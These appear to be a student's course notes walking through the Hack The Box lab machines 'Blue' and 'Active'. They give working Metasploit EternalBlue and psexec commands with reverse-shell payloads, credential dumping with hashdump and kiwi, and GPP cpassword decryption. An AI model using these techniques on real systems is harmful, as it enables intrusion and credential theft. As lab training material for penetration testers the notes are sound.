Week 10: MS17-010, GPP/cPasswords, and Kerberoasting
AD Exploitation Part 3
Blue
If you see SMB on a network, you should immediately check if it's vulnerable to MS17-010. This could take a service down, so you want to ask before running it.
nmap -Pn -p445 --script=smb-vuln-ms17-010 <ip>
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
meterpreter > sysinfo
meterpreter > hashdump
meterpreter > shell
c:\Users\Administrator>arp -a
c:\Users\Administrator>route print
#check if machine is dual-homed. if two NICs, can pivot
# e.g. if on 10.10.10.X and 10.10.11.X
c:\Users\Administrator>netstat -ano
^C terminate channel -> back to meterpreter
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > load kiwi # this is x64
meterpreter > creds_all
meterpreter > wifi_list
Mimikatz is for 32 bit architecture and kiwi is for 64 bit architecture.
Active
A 'realistic' box. Likely a domain controller since it's running DNS, Kerberos, LDAP for Active Directory). Domain: active.htb. When there's SMB, check for anonymous login. See Group Policy Pwnage.
Enumeration
Likely a Domain Controller since it's running DNS, Kerberos, LDAP. Domain: active.htb. Common to domain controllers message signing is enabled and required for smb. Most of SMB and NTLM relay is done on machines other than Domain Controller since the functionality is usually turned off.
We could maybe dump ldap information, but we typically won't have access to that without credentials. 445 and 139 are very interesting because SMB is behind a lot of exploits.
Let's try to list out the contents of the smb directory.
root@kali:~/Security/HackTheBox/active# smbclient -L \\\\10.10.10.100\\
Enter WORKGROUP\root's password: # just pressed enter
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
Anonymous login is a finding. Absolutely list shares on a report. Let's see what we can connect to; the juiciest folders are C$ and ADMIN$.
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\ADMIN$
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\C$
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\IPC$
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ^C
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\NETLOGON
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ^C
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\SYSVOL
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\Users
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
We can connect to Replication and IPC$. Replication might be a backup of something. Let's mget everything in Replication.
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (3.1 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.5 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (9.4 KiloBytes/sec) (average 2.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (12.5 KiloBytes/sec) (average 3.8 KiloBytes/sec)
Groups.xml is promising. Let's cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml.
Groups.xml is related to GPP (Group Policy Preferences). It allows Domain Admins to create Domain Policies using embedded credentials. We find: userName="active.htb\SVC_TGS" and cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ". SVC_TGS is the Ticket Granting Service. Groups.xml exists on some active domains, usually older ones. But, migrated ones may still have it. You can set one up as a honeypot though--a GPP that has never been used. As soon as credentials as used, you know there's a hacker on the network.
root@kali:~/Security/HackTheBox/active# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
New creds - active.htb:GPPstillStandingStrong2k18. We could try to push the creds around with crackmapexec. We could try to login to SMB with this account. We could use psexec on this machine. Another tactic is Kerberoasting.
Kerberoasting
Kerberos: an authentication protocol using tickets to communicate and authenticate.
We have a server that is considered a KDC (Key Distribution Center). We also have another computer, the client. The client wants to authenticate, so it sends credentials and asks the server for a TGT (a ticket-granting ticket). KDC checks the creds and if they are good, sends back a secret key (encrypted by TGS) that's stored on the client until the ticket expires. There are also services (SQL, AntiVirus, etc) that the client might want to connect to. A service has a Service Principal Name (SPN). To connect as a client, we need to ask the KDC for permission. Client takes the ticket to KDC and asks to please connect to the service. With any valid ticket or TGT, we can request a TGS ticket for an SPN.
Impacket allows us to do this. Mine is located: /opt/impacket/examples/GetUserSPNs.py.
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.100
RHOSTS => 10.10.10.100
msf5 exploit(windows/smb/psexec) > set SMBDomain active.htb
SMBDomain => active.htb
msf5 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf5 exploit(windows/smb/psexec) > set SMBPass Ticketmaster1968
SMBPass => Ticketmaster1968
msf5 exploit(windows/smb/psexec) > run
...
[*] 10.10.10.100:445 - Selecting PowerShell target
...
[*] Exploit completed, but no session was created.
Let's try exploit targets other than automatic.
msf5 exploit(windows/smb/psexec) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 PowerShell
2 Native upload
3 MOF upload
msf5 exploit(windows/smb/psexec) > set target 2
target => 2
msf5 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain active.htb no The Windows domain to use for authentication
SMBPass Ticketmaster1968 no The password for the specified username
SMBUser administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec) > set LHOST 10.10.14.66
LHOST => 10.10.14.66
msf5 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.14.66:4444
[*] 10.10.10.100:445 - Connecting to the server...
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445|active.htb as user 'administrator'...
[*] 10.10.10.100:445 - Selecting PowerShell target
[*] 10.10.10.100:445 - Executing the payload...
[+] 10.10.10.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (180291 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.14.66:4444 -> 10.10.10.100:57946) at 2020-09-01 22:33:05 -0400
meterpreter > sysinfo
Computer : DC
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : el_GR
Domain : ACTIVE
Logged On Users : 1
Meterpreter : x86/windows
Okay, got the meterpreter session open but meterpreter is x86 and the machine is x64. Let's try this again with a different payload.
msf5 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.14.66:4444
[*] 10.10.10.100:445 - Connecting to the server...
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445|active.htb as user 'administrator'...
[*] 10.10.10.100:445 - Uploading payload... NKFqsUot.exe
[*] 10.10.10.100:445 - Created \NKFqsUot.exe...
[+] 10.10.10.100:445 - Service started successfully...
[*] Sending stage (206403 bytes) to 10.10.10.100
[*] 10.10.10.100:445 - Deleting \NKFqsUot.exe...
[*] Meterpreter session 4 opened (10.10.14.66:4444 -> 10.10.10.100:57982) at 2020-09-01 22:40:44 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > shell
Process 1820 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type C:\Users\SVC_TGS\Desktop\user.txt
type C:\Users\SVC_TGS\Desktop\user.txt
{censored}
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
{censored}